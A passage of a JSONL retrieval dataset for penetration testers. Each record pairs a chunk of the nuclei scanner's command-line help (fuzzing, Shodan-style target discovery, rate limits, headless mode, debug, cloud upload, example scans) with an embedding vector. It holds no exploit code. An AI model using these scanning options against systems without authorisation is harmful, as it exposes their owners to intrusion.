-0.01835, -0.0128, -0.03019, -0.05484, -0.06412, 0.07274, 0.07699, 0.10249, 0.01339, 0.00261, -0.00602, 0.02593, 0.05894, 0.06076, 0.02416, 0.14389, 0.04168, -0.01291, -0.0198, -0.07339, 0.10236, 0.00602, -0.04064, -0.03571, -0.06808, -0.04121, -0.11436, -0.04508, -0.05189, -0.02283, -0.0223, 0.06637, 0.00912, 0.01831, 0.09818, 0.00018, -0.01891, -0.06577, -0.0495, 0.0711, 0.00512, 0.00825, 0.01231, -0.03506, -0.05115, -0.03267, 0.08192, 0.01003, -0.03085, -0.0309, -0.07197, 0.03986, -0.03824, 0.04811, -0.01908, 0.06455, -0.08186, -0.02929, -0.01921, 0.0159, 0.0375, -0.02938, 0.08231, 0.01159, 0.09279, 0.08334, -0.01345, 0.04349, 0.02846, 0.01598, 0.00326, 0.01536, -0.00654, 0.01459, -0.04009, -0.03293, 0.05214, -0.01966, 0.02394, 0.02275, -0.04001, 0.05663, -0.01, 0.05812, 0.06449, 0.00089, -0.05826, 0.02448, -0.11137, 0.02214, -0.02573, 0.00626, 0.03203, 0.06763, -0.01347, 0.08914, -0.00607, 0.03282, 0.03231, 0.03913, -0.02681, -0.06708, -0.00127, 0.01299, -0.05842, 0.06645, -0.02426, 0.04838, -0.05201, -0.03137, -0.05663, 0.04701, 0.02546, -0.02045, -0.05203, 0.00705, -0.01388, -0.06365, -0.0025, -0.01338, -0.01399, -0.05164, -0.01193, 0.02436, -0.04055, 0.01672, -0.03177]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "v": [0.2097, -0.11402, -0.2526, -0.08316, 0.04627, -0.00565, -0.13056, -0.06282, 0.07182, 0.06146, -0.18501, -0.0248, -0.14729, 0.05016, -0.00107, -0.11341, -0.07471, -0.03794, -0.08805, -0.01008, 0.02597, -0.11508, -0.11166, -0.16884, -0.08936, 0.13202, 0.00855, 0.01732, -0.14533, -0.10109, 0.11206, -0.06541, -0.01516, 0.06299, -0.02348, -0.01214, 0.06432, 0.0473, -0.05246, 0.1556, 0.02287, 0.07467, -0.17951, 0.02939, 0.0233, -0.10609, -0.02367, 0.05722, 0.09333, -0.08308, 0.04202, 0.0099, -0.01445, 0.02102, -0.0043, -0.01929, 0.00958, -0.13164, 0.0423, 0.07049, 0.01825, -0.06568, 0.00224, -0.06951, -0.01705, -0.04396, 0.03259, -0.05515, -0.02646, 0.03784, 0.00732, -0.07372, -0.01292, -0.14768, 0.09643, 0.07456, 0.04646, -0.11005, 0.04159, 0.05949, -0.01692, -0.02898, -0.09951, 0.00795, -0.01941, -0.038, 0.02759, -0.11129, -0.03573, -0.04209, 0.08196, 0.08899, -0.05325, 0.00617, 0.02646, -0.02198, 0.00222, -0.00438, 0.01841, -0.06741, 0.04358, 0.05627, -0.12771, 0.09243, 0.09684, -0.08843, 0.11072, -0.045, 0.0273, -0.06856, 0.04308, 0.0219, 0.05686, -0.12214, 0.01323, -0.11042, -0.03818, 0.0245, 0.08004, -0.00199, -0.01626, -0.0795, 0.04197, 0.00385, -0.01941, -0.02072, 0.00018, -0.0161, 0.06175, -0.01002, 0.02373, 0.04685, -0.02941, 0.0114, 0.02153, 0.05863, 0.09938, 0.02782, -0.05062, -0.00314, 0.0134, 0.107, -0.00195, 0.08969, 0.15714, -0.08076, 0.02611, -0.02842, -0.01588, 0.06982, -0.03463, 0.02934, 0.00374, -0.01548, -0.08525, -0.08887, 0.09465, -0.03992, -0.05312, 0.0155, 0.06875, 0.03235, -0.0007, 0.0304, 0.00568, 0.02765, -0.01097, -0.01346, 0.03574, -0.08285, -0.00648, 0.00307, -0.00131, -0.02513, 0.00248, -0.02975, -0.05002, -0.06184, 0.04594, -0.07717, 0.04147, 0.00976, -0.01191, 0.03689, 0.04088, -0.06386, -0.00369, -0.01113, 0.01787, 0.02413, 0.02968, 0.00808, -0.00647, 0.04862, -0.04876, 0.01299, -0.03323, -0.03891, -0.03727, -0.05915, -0.02924, -0.01458, 0.00291, -0.1015, 0.01873, 0.00595, -0.01494, 0.00518, -0.03367, -0.04367, 0.03766, -0.05664, 0.0088, -0.00196, -0.03929, 0.02008, 0.00685, -0.03647, 0.03221, -0.01943, 0.00392, 0.04145, 0.05676, -0.04191, -0.04489, -0.02365, 0.03602, -0.00704, 0.06478, 0.01872, -0.02499, 0.02563, -0.00935, -0.00752, 0.00922, -0.02606, 0.03771, 0.04164, -0.06946, -0.06881, 0.03426, 0.0442, -0.0123, -0.00063, 0.02904, -0.01948, -0.08646, -3e-05, -0.0179, -0.03103, -0.01606, 0.02748, -0.01417, -0.02665, 0.01059, -0.00138]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "UNCOVER:\n -uc, -uncover enable uncover engine\n -uq, -uncover-query string[] uncover search query\n -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan)\n -uf, -uncover-field string uncover fields to return (ip,port,host) (default \"ip:port\")\n -ul, -uncover-limit int uncover results to return (default 100)\n -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)", "v": [0.20064, -0.15397, -0.14437, -0.05938, 0.1068, -0.12039, -0.16662, -0.05372, -0.00873, -0.04661, -0.17129, -0.17262, -0.0411, -0.01406, -0.14948, -0.04855, -0.05454, -0.0206, -0.02726, -0.01351, 0.00071, -0.01196, -0.05249, -0.10438, -0.03122, 0.04842, -0.09124, 0.08257, -0.05848, -0.06278, -0.00278, 0.03961, 0.01314, 0.01713, -0.12004, -0.02678, -0.00065, 0.08217, 0.01489, 0.11714, 0.01919, -0.05898, -0.18317, 0.09359, 0.07344, -0.04957, -0.05083, 0.08311, 0.04082, -0.10875, -0.10614, 0.02786, -0.13112, -0.10148, 0.01046, 0.04094, 0.03674, 0.06393, 0.00289, 0.00181, -0.02148, -0.01766, -0.08688, -0.0213, 0.14428, 0.01763, 0.06186, 0.04138, -0.03198, -0.02697, -0.01934, 0.00323, -0.03377, -0.01044, 0.01336, 0.03738, 0.0642, -0.14432, 0.11389, 0.05907, -0.08708, -0.01572, -0.14325, 0.042, -0.01974, -0.00456, 0.11133, -0.05256, -0.0625, -0.09417, 0.03003, 0.03689, -0.10992, 0.07612, -0.0512, -0.07977, 0.04582, 0.03451, -0.00979, 0.03106, 0.002, -0.02528, -0.08242, 0.17844, 0.1298, 0.03787, 0.01291, -0.04829, -0.02109, -0.01436, 0.10041, -0.02834, -0.01775, -0.11287, 0.01161, -0.02085, -0.00704, 0.04901, 0.04163, -0.02109, -0.16214, -0.04497, -0.00462, 0.00309, -0.01119, -0.09303, -0.01964, 0.05221, 0.06032, -0.00653, 0.05658, 0.04561, -0.07018, 0.00769, -0.00116, 0.11088, 0.09834, -0.00111, 0.00415, -0.00284, 0.05615, 0.08802, -0.08455, -0.00239, 0.10437, 0.02817, 0.01387, -0.00659, -0.04383, -0.01251, -0.02862, 0.01228, -0.00798, 0.02161, -0.03739, -0.04457, 0.02617, -0.06443, 0.04479, -0.0193, 0.0465, -0.03049, -0.02605, 0.00137, -0.05179, 0.05739, 0.00154, -0.09305, -0.01598, -0.12226, -0.05432, -0.00292, 0.00911, -0.07777, 0.01871, 0.04757, 0.01839, -0.03991, -0.01862, -0.04677, -0.02663, -0.0151, 0.06206, 0.04027, -0.04755, -0.0869, 0.06746, -0.04086, -0.02326, -0.04278, 0.0703, 0.03787, -0.0388, 0.00563, -0.03075, 0.05201, -0.04404, 0.01806, -0.00904, -0.03574, -0.00676, -0.01218, -0.03344, -0.04718, -0.02876, -0.0153, 0.01119, -0.00357, -0.02892, -0.0128, 0.02611, -0.06587, -0.01199, 0.0387, -0.06835, 0.00683, -0.02372, -0.01953, 0.00093, 0.02794, 0.03581, 0.08542, 0.04303, 0.03968, 0.05337, -0.0117, 0.03341, -0.00814, 0.08851, -0.05599, -0.01636, 0.04342, -0.06742, -0.01546, 0.02156, -0.04369, 0.04389, -0.03225, -0.06641, 0.01231, 0.07245, -0.01618, -0.00369, 0.00337, 0.02056, -0.06125, -0.03893, 0.03087, -0.0125, 0.00261, -0.02465, 0.02925, -0.00934, -0.07758, 0.04333, -0.0572]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "v": [0.13282, -0.01039, -0.12409, -0.1735, -0.0152, -0.132, -0.10128, 0.11133, 0.00523, 0.12007, -0.11617, -0.08477, 0.0758, -0.06789, -0.0295, -0.05563, -0.2327, -0.03996, -0.01451, -0.03535, 0.04213, -0.14201, -0.11665, -0.01669, 0.02377, 0.16657, -0.06509, 0.0903, -0.12184, -0.02697, 0.03634, -0.0211, -0.0211, -0.03998, 0.001, 0.0067, -0.03789, 0.15145, -0.05136, 0.13042, 0.07858, 0.03661, -0.1609, 0.00469, 0.13004, -0.08662, 0.01236, 0.12328, 0.01899, -0.17254, -0.04129, 0.03519, -0.09627, 0.07492, -0.01249, 0.0606, 0.0273, -0.03558, -0.07832, -0.14035, 0.02182, -5e-05, -0.0383, -0.02639, 0.0379, 0.0293, 0.03903, 0.01273, 0.00223, -0.01597, -0.07262, -0.12554, -0.10881, -0.04073, 0.07567, 0.00457, -0.06838, -0.08443, 0.11544, 0.08128, -0.08036, 0.01579, -0.08319, -0.01684, -0.04033, -0.03991, 0.03277, -0.02739, 0.04242, 0.06496, 0.11641, 0.02043, 0.02724, 0.01711, -0.01866, -0.15045, 0.0111, 0.02326, 0.00832, -0.03023, 0.02244, 0.05357, -0.13181, 0.10983, 0.08815, 0.08388, 0.0778, -0.05333, -0.03037, 0.02235, 0.05403, -0.00404, -0.02904, 0.0026, -0.03235, -0.10391, -0.01983, 0.07653, 0.07581, -0.01675, -0.1204, 0.02451, 0.01121, -0.00078, 0.03838, -0.03187, -0.02262, 0.07773, 0.02318, -0.03998, 0.02328, 0.11442, 0.08464, -0.01023, -0.00975, 0.08702, 0.07123, 0.00694, -0.03839, -0.00093, -0.02252, 0.06389, -0.06026, 0.02353, 0.0701, 0.04664, -0.00032, -0.00186, -0.0698, 0.00071, 0.00205, 0.02062, -0.02554, 0.02321, -0.09496, -0.06717, 0.01906, -0.03616, 0.05834, -0.02738, 0.04721, 0.07823, 0.01874, 0.0342, -0.0464, -0.00188, 0.05792, -0.04734, -0.00623, -0.01, -0.0581, -0.03333, -0.10253, -0.06976, 0.00146, 0.04075, 0.01214, -0.09363, -0.03021, -0.02821, 0.02147, -0.02772, 0.00795, 0.02024, 0.06586, -0.06102, -0.03988, 0.02696, 0.04074, 0.03937, 0.00086, 0.05314, 0.04637, -0.03645, 0.0178, -0.03308, 0.02967, 0.02526, 0.02111, 0.03514, -0.03016, -0.01048, -0.07448, -0.06942, -0.02086, 0.00759, 0.00084, 0.00774, 0.02589, -0.00538, 0.05572, -0.08879, -0.00067, 0.01184, -0.06415, -0.03925, -0.03553, -0.03472, 0.09325, 0.00494, -0.01851, 0.01149, -0.00733, -0.00876, -0.00547, 0.04833, 0.04385, 0.03164, 0.07789, -0.02204, -0.0766, 0.01304, -0.06129, -0.04494, 0.05699, -0.01231, -0.02177, 0.03485, -0.01634, 0.0319, 0.01267, 0.0394, -0.03331, 0.02531, 0.04408, 0.0438, -0.03524, -0.02596, 0.00264, 0.04308, -0.05427, -0.00821, -0.0318, -0.03674, 0.02293, 0.00113]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "OPTIMIZATIONS:\n -timeout int time to wait in seconds before timeout (default 10)\n -retries int number of times to retry a failed request (default 1)\n -ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)\n -mhe, -max-host-error int max errors for a host before skipping from scan (default 30)\n -te, -track-error string[] adds given error to max-host-error watchlist (standard, file)\n -nmhe, -no-mhe disable skipping host from scan based on errors\n -project use a project folder to avoid sending same request multiple times\n -project-path string set a specific project path (default \"/tmp\")\n -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)\n -stream stream mode - start elaborating without sorting the input\n -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)\n -irt, -input-read-timeout value timeout on input read (default 3m0s)\n -nh, -no-httpx disable httpx probing for non-url input\n -no-stdin disable stdin processing", "v": [0.16012, 0.06877, -0.23819, -0.26093, 0.00432, -0.11439, -0.16475, -0.03474, 0.05024, 0.07471, -0.21381, -0.10746, 0.06872, -0.08876, -0.00014, -0.04158, 0.00367, -0.00871, 0.02075, -0.02513, -0.05843, -0.00154, 0.01197, -0.08171, 0.03277, 0.07845, -0.11346, 0.08837, -0.26416, -0.11401, -0.02009, -0.05874, 0.03009, -0.03279, -0.01063, -0.03581, -0.00326, 0.04398, 0.00812, 0.21589, 0.00242, 0.06815, -0.04799, 0.06766, 0.0618, -0.13052, 0.01833, 0.05714, 0.01459, -0.0718, -0.06838, 0.01487, -0.10549, 0.04558, -0.02778, 0.07473, 0.10113, -0.13411, -0.07879, -0.08036, -0.00891, 0.01599, -0.01323, -0.08692, 0.06554, 0.00891, 0.01403, 0.02285, -0.10171, 0.05574, -0.07003, -0.03834, 0.041, -0.09156, 0.08549, -0.04135, -0.03071, -0.05121, 0.04989, 0.06102, -0.00426, -0.04145, -0.06216, -0.03309, -0.03875, -0.07174, -0.03122, -0.0208, -0.02142, -0.01256, 0.05451, -0.03308, 0.00325, 0.0053, -0.02591, -0.11671, 0.07769, -0.02696, 0.02056, -0.05691, 0.00641, -0.01439, -0.11923, 0.13235, 0.10897, -0.02517, 0.09993, 0.01029, 0.0057, -0.03886, 0.02776, 0.02217, -0.05744, -0.0935, 0.00122, -0.08975, -0.02212, 0.03814, 0.00598, -0.01207, -0.07748, -0.11375, -0.03473, -0.00725, 0.00772, -0.00212, 0.02073, 0.0813, 0.04971, 0.03042, -0.01131, 0.04268, -0.06331, -0.02501, -0.04144, 0.0679, 0.06657, -0.03181, 0.00533, -0.0026, 0.00092, 0.08986, -0.02203, 0.06312, 0.08484, 0.0179, 0.00297, -0.0618, -0.07908, -0.02168, 0.00387, 0.05015, 0.02622, -0.0412, -0.08157, -0.07006, 0.04283, -0.07306, 0.02506, 0.01408, 0.0358, 0.01855, 0.05843, 0.07362, 0.01336, -0.0044, -0.04236, 0.00764, 0.04776, -0.05001, -0.05556, 0.04619, -0.08562, -0.10491, -0.06686, -0.00702, -0.00767, -0.04937, 0.04115, -0.03925, 0.02556, -0.03954, 0.01307, 0.03671, 0.04224, -0.07527, -0.02683, -0.02591, 0.04154, 0.00933, -0.00404, 0.07705, -0.01735, 0.02124, 0.03504, 0.00402, -0.0314, 0.00748, 0.02382, 0.00678, -0.03859, 0.03767, 0.03846, -0.03739, 0.03939, -0.00059, -0.01077, 0.03115, -0.04446, 0.00998, 0.04556, -0.05881, 0.06687, 0.0048, -0.05884, -0.01043, 0.01968, -0.01843, 0.02352, -0.00288, -0.01384, 0.05475, 0.01953, -0.00675, 0.01342, -0.01777, 0.08381, -0.00075, 0.05858, -0.0351, -0.03191, 0.03193, -0.06032, -0.00763, 0.06855, -0.02765, -0.00322, 0.00195, -0.02632, -0.03512, 0.06786, 0.01953, -0.01505, -0.01056, -0.01564, -0.00974, -0.0645, -0.00497, 0.02114, -0.04888, -0.02588, -0.00796, -0.00315, -0.06523, 0.0121, -0.04454]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "HEADLESS:\n -headless enable templates that require headless browser support (root user on Linux will disable sandbox)\n -page-timeout int seconds to wait for each page in headless mode (default 20)\n -sb, -show-browser show the browser on the screen when running templates with headless mode\n -ho, -headless-options string[] start headless chrome with additional options\n -sc, -system-chrome use local installed Chrome browser instead of nuclei installed\n -lha, -list-headless-action list available headless actions", "v": [0.08684, -0.02687, -0.21204, -0.19387, -0.12419, -0.16883, -0.19984, 0.04196, 0.06545, 0.07155, -0.22411, -0.11875, -0.03661, -0.08372, 0.10558, -0.02147, -0.00277, -0.06917, -0.03952, -0.08814, -0.09676, -0.00963, -0.12367, -0.03485, 0.05897, 0.00511, -0.05247, 0.13575, -0.1136, -0.10243, -0.07145, -0.02204, 0.05882, 0.0211, -0.10942, 0.03266, -0.04737, -0.04456, -0.04764, 0.23244, 0.01805, 0.04591, -0.05328, 0.14609, 0.01662, -0.09628, 0.05186, -0.04701, 0.04669, -0.04749, -0.01079, 0.05061, -0.21619, 0.03575, 0.04128, 0.06073, 0.13043, -0.11484, -0.0129, -0.04439, -0.08737, 0.0666, -0.02269, 0.00508, 0.0615, 0.0565, 0.01645, 0.02781, 0.02259, 0.04768, -0.05336, -0.06872, 0.02124, -0.05216, 0.04945, 0.04589, 0.03384, 0.02124, 0.08608, 0.08734, 0.07536, -0.03028, -0.05464, 0.05094, -0.09176, -0.13481, 0.00447, 0.00362, -0.00513, -0.04218, 0.11724, 0.06049, 0.00046, 0.03078, -0.00924, -0.05512, 0.01647, 0.00877, 0.07301, -0.05244, 0.05618, -0.00037, -0.06775, 0.11769, 0.14544, -0.02252, 0.07738, -0.03169, 0.01238, 0.01065, 0.0154, -0.03346, -0.0606, 0.01442, 0.00198, 0.01358, -0.01132, 0.02843, 0.0158, -0.065, -0.05179, -0.03649, -0.04128, -0.04683, -0.00068, -0.00698, -0.01723, 0.02852, -0.03336, 0.04418, 0.05345, -0.07495, 0.06661, -0.04498, -0.10229, 0.06544, 0.02113, 0.04647, -0.03177, 0.0049, 0.03653, 0.08682, 0.00536, 0.06951, 0.12157, -0.0899, 0.01564, 0.00223, -0.05915, -0.01989, 0.06533, -0.00089, 0.00901, -0.05684, -0.07905, -0.045, 0.00659, 0.02287, 0.11974, -0.00872, -0.01131, 0.00943, 0.05539, 0.08513, -0.02858, 0.03462, -0.03178, 0.02585, 0.02946, 0.02389, -0.01394, 0.04659, 0.0124, -0.02401, 0.02067, 0.00152, 0.02808, -0.02622, 0.00965, 0.02411, 0.03478, 0.02667, -0.02254, 0.00916, -0.01296, -0.10009, -0.05722, -0.03736, -0.02595, -0.02474, -0.02805, 0.07515, -0.04846, 0.04299, 0.08891, 0.04101, -0.00961, -0.04753, 0.02512, -0.01382, -0.0385, 0.06199, 0.02314, -0.02962, -0.05583, -0.00958, 0.00918, -0.01197, 0.00932, 0.0349, -0.05124, -0.06523, 0.04302, 0.07903, 0.01938, -0.04486, -0.02037, -0.01256, 0.01142, -0.02646, -0.00995, -0.0288, -0.01234, 0.01528, -0.02541, -0.01625, 0.03485, -0.02181, 4e-05, -0.03416, -0.01733, -0.0146, -0.01996, -0.00326, 0.02428, -0.04707, -0.04581, 0.02077, 0.01043, -0.00257, 0.00721, 0.04884, 0.01756, 0.00526, -0.04452, -0.02585, -0.04438, -0.028, 0.0199, 0.00372, -0.0342, -0.01076, -0.02428, -0.0501, -0.02859, 0.04034]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "v": [0.18406, -0.0394, -0.23128, -0.3094, 0.03873, -0.09188, -0.10391, 0.01345, 0.12108, 0.01842, -0.10402, -0.21243, -0.07681, -0.24382, -0.01532, -0.11453, -0.01488, -0.11193, 0.03873, -0.05778, -0.0362, 0.02445, -0.15452, -0.06297, 0.06234, 0.08026, -0.11297, 0.07173, -0.09001, -0.10382, 0.00265, -0.09989, 0.00098, -0.02234, -0.08464, 0.04538, 0.02496, -0.01503, 0.02335, 0.25371, -0.01427, -0.03665, -0.10061, 0.05807, -0.02279, -0.1374, 0.07723, 0.0235, 0.05966, -0.07125, -0.06659, -0.03031, -0.12493, 0.0551, -0.03738, -0.07505, 0.06223, -0.12172, 0.05803, -0.02495, -0.09195, 0.01454, 0.00324, -0.12963, 0.07564, 0.04479, 0.06381, -0.00959, -0.08858, 0.04411, -0.09503, 0.01652, 0.03689, -0.07737, 0.03823, -0.05052, -0.00018, -0.12876, 0.04548, 0.12077, -0.07794, -0.05624, -0.01697, 0.02308, -0.02859, -0.01615, -0.04943, -0.01586, 0.02381, -0.0176, 0.07199, 0.03678, 0.0053, 0.05632, 0.02823, -0.06811, 0.0663, -0.01614, 0.04025, -0.08515, -0.01224, 0.0011, -0.05631, 0.09316, 0.0559, -0.00018, 0.03239, -0.02151, 0.03055, 0.03206, 0.11065, -0.06847, 0.0032, -0.00732, 0.02191, -0.00128, -0.01047, 0.04738, -0.04783, 0.03569, -0.03649, -0.05467, -0.01542, -0.00618, 0.0546, -0.05054, -0.01962, 0.05189, 0.03148, 0.06032, 0.01202, 0.01046, -0.05241, -0.06688, -0.00749, 0.02846, 0.07524, 0.00365, -0.00894, 0.00398, -0.00039, 0.05836, 0.02311, 0.07447, 0.0437, 0.01245, -0.03323, -0.01514, -0.06882, 0.01226, 0.06363, 0.04261, -0.01288, -0.00504, -0.08308, -0.08447, 0.05079, -0.04103, -0.01314, -0.03006, 0.03236, 0.01981, -0.03502, 0.03242, 0.02706, 0.00278, 0.03103, -0.01875, 0.0601, -0.03914, -0.01487, 0.0143, -0.00457, -0.11395, -0.02662, 0.00354, -0.00681, -0.02105, 0.01285, -0.03212, 0.04263, -0.01195, 0.05445, 0.01477, 0.05444, -0.02456, -0.01366, 0.0034, 0.06137, 0.00534, -0.02124, 0.02471, -0.02632, 0.0152, 0.0277, 0.02251, -0.03689, 0.00317, 0.02664, -0.01955, -0.00905, -0.00827, 0.01781, -0.05862, 0.00136, 0.01817, -0.02374, 0.02038, 0.02727, -0.01097, 0.09312, -0.03573, 0.02616, 0.03371, -0.04046, 0.00685, -0.04689, 0.04305, 0.03536, -0.02688, -0.02194, 0.01442, 0.04094, -0.03682, -0.00571, -0.00353, 0.04087, -0.00857, 0.06121, -0.01074, -0.00787, 0.04474, -0.00266, -0.00124, -0.01324, -0.03813, -0.04013, 0.00078, 0.01485, -0.04489, 0.00065, 0.0437, -0.00798, -0.0015, -0.00306, -0.00382, -0.03836, 0.0431, 0.00933, -0.02423, -0.01224, -0.03988, -0.02162, -0.06033, 0.01404, -0.01606]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "v": [0.11441, 0.02291, -0.1819, -0.31411, 0.047, -0.17631, -0.18923, -0.08305, -0.0525, 0.13696, -0.17238, -0.19883, -0.0331, -0.0225, -0.06574, -0.15245, -0.07395, -0.08594, 0.01007, -0.00632, -0.13362, -0.08603, -0.09352, -0.07091, 0.01083, 0.12957, -0.13322, 0.0161, -0.19157, -0.06665, 0.01974, -0.10788, -0.044, -0.01119, -0.07429, -0.00918, -0.03171, 0.05648, -0.05409, 0.09402, 0.01486, -0.05748, 0.04373, -0.03999, 0.09905, -0.07723, 0.03776, 0.03883, 0.08094, -0.14894, -0.0471, 0.11106, 0.00235, 0.06297, -0.05911, -0.07, 0.08369, 0.01501, 0.02693, -0.08173, 0.01709, 0.06423, -0.12046, -0.13582, 0.0447, 0.00187, 0.01327, -0.05184, -0.11705, 0.04184, 0.02443, 0.01371, 0.06512, -0.02131, -0.10187, 0.00656, -0.0044, -0.09361, -0.00189, 0.04374, -0.08892, -0.04018, 0.00995, 0.02343, -0.01911, -0.02687, -0.003, 0.00017, -0.07067, -0.05794, 0.08958, -0.0943, 0.01201, 0.0523, 0.02076, 0.03697, 0.01137, -0.11104, 0.00281, -0.03766, -0.07129, 0.00406, -0.03482, 0.08828, 0.07463, 0.0067, 0.03681, -0.02294, 0.0345, 0.06824, 0.04773, 0.04936, 0.00895, -0.03733, 0.05526, 0.06229, -0.01409, 0.02981, -0.01273, -0.07811, -0.00785, -0.04995, -0.05578, -0.02237, -0.06747, -0.05776, -0.03342, 0.02891, 0.06234, 0.01568, 0.01004, -0.03397, 0.04142, -0.01213, -0.09993, 0.05284, 0.02493, -0.03003, -0.01305, -0.03888, -0.04108, 0.04721, 0.01517, 0.02983, 0.09188, -0.05933, 0.01008, 0.03727, -0.04994, 0.05111, 0.08961, 0.01918, -0.0096, 0.04369, -0.00996, -0.09336, 0.02706, -0.08888, 0.02205, -0.01578, 0.04445, -0.00427, -0.05716, -0.00738, -0.0305, 0.08443, 0.02781, 0.02591, 0.07781, -0.03452, -0.01851, 0.03463, -0.06968, -0.07718, -0.01509, 0.02114, -0.01309, 0.02856, -0.03035, -0.01313, 0.03186, -0.01838, 0.00179, -0.01856, 0.0038, -0.06093, -0.00335, -0.0052, 0.00502, 0.01196, -0.0271, -0.00311, 0.06606, 0.04401, 0.06697, -0.01992, 0.01004, 0.02038, 0.07198, 0.05749, -0.02371, -0.03616, 0.03683, -0.03512, -0.01783, 0.0225, 0.03766, 0.00119, -0.00235, -0.04693, 0.00037, -0.0166, 0.02612, 0.00918, -0.05224, -0.00573, 0.02289, -0.00232, 0.08557, -0.04991, -0.0128, 0.03827, 0.02199, -0.0361, 0.04682, 0.02283, -0.0162, 0.00215, 0.0401, 0.01147, -0.01595, 0.06889, 0.03039, 0.01846, 0.03879, 0.0081, 0.00799, 0.04528, -0.03035, -0.03364, 0.01918, 0.03113, 0.02273, 0.00835, -0.00277, 0.00504, 0.02262, -0.00351, 0.04361, -0.0561, -0.01609, -0.01643, 0.03936, -0.05291, 0.00458, 0.02943]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "CLOUD:\n -auth configure projectdiscovery cloud (pdcp) api key (default true)\n -tid, -team-id string upload scan results to given team id (optional) (default \"none\")\n -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]\n -sid, -scan-id string upload scan results to existing scan id (optional)\n -sname, -scan-name string scan name to set (optional)\n -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard\n -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard\n\nAUTHENTICATION:\n -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan\n -ps, -prefetch-secrets prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n\t$ nuclei -target example.com\n\nRun nuclei with specific template directories:\n\t$ nuclei -target example.com -t http/cves/ -t ssl\n\nRun nuclei against a list of hosts:\n\t$ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n\t$ nuclei -target example.com -json-export output.json", "v": [0.10794, -0.15459, -0.21398, -0.25394, 0.06696, -0.20604, -0.1037, -0.05337, 0.03632, 0.07253, -0.12663, -0.18658, -0.13885, -0.12054, -0.15194, 